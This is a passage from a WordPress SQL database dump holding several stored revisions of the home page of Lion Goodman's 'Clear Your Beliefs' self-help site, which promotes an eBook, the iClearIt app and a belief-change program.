width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="size-full wp-image-1489 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 21:05:55', '2014-10-08 02:05:55', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1498, 2, '2014-10-08 00:28:08', '2014-10-08 05:28:08', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" />\n\n[Form id="10"]\n\n<p>Step 2</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE  iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p></p><p>Step 3</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-08 00:28:08', '2014-10-08 05:28:08', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1491, 2, '2014-10-07 21:06:52', '2014-10-08 02:06:52', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1</p><p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p><p><a href="#"><img class="aligncenter size-full wp-image-1486" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png" alt="btn_11" width="225" height="60" /></a></p><p></p><p>Step 2</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE  iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p></p><p>Step 3</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 21:06:52', '2014-10-08 02:06:52', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1496, 2, '2014-10-07 23:43:50', '2014-10-08 04:43:50', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" />\n\n[Form id="10"]\n\n<a href="#"><img class="aligncenter size-full wp-image-1486" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png" alt="btn_11" width="225" height="60" /></a>\n\n<p>Step 2</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE  iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p></p><p>Step 3</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 23:43:50', '2014-10-08 04:43:50', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1493, 2, '2014-10-07 23:31:19', '2014-10-08 04:31:19', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\nStep 1\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" />\n\n<h3>Fieldset</h3>Name Email &nbsp;<h3>Verification</h3>Please enter any two digits *Example: 12This box is for spam protection - <strong>please leave it blank</strong>:\n\n<a href="#"><img class="aligncenter size-full wp-image-1486" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png" alt="btn_11" width="225" height="60" /></a>\n\n<p>Step 2</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE  iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p></p><p>Step 3</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 23:31:19', '2014-10-08 04:31:19', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1492, 2, '2014-10-07 23:24:25', '2014-10-08 04:24:25', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1</p><p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" /></p><p>\n<h3>Oops! Missing Fieldset</h3><p style="color:black;">If you are seeing this message, it means you need to <strong>add a Fieldset to the beginning of your form</strong>. Your form may not function or display properly without one.</p>Name Email &nbsp;<h3>Verification</h3>Please enter any two digits *Example: 12This box is for spam protection - <strong>please leave it blank</strong>:\n\n</p><p><a href="#"><img class="aligncenter size-full wp-image-1486" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png" alt="btn_11" width="225" height="60" /></a>  </p><p>Step 2</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE  iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p></p><p>Step 3</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-07 23:24:25', '2014-10-08 04:24:25', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1497, 2, '2014-10-08 00:13:49', '2014-10-08 05:13:49', '', 'get access', '', 'inherit', 'closed', 'open', '', 'get-access', '', '', '2014-10-08 00:13:49', '2014-10-08 05:13:49', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/get-access.jpg', 0, 'attachment', 'image/jpeg', 0),
(1499, 2, '2014-10-08 00:30:00', '2014-10-08 05:30:00', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n<p>Step 1</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /><p>[Form id="10"] </p><p>Step 2</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE  iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p></p><p>Step 3</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you backChange your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s 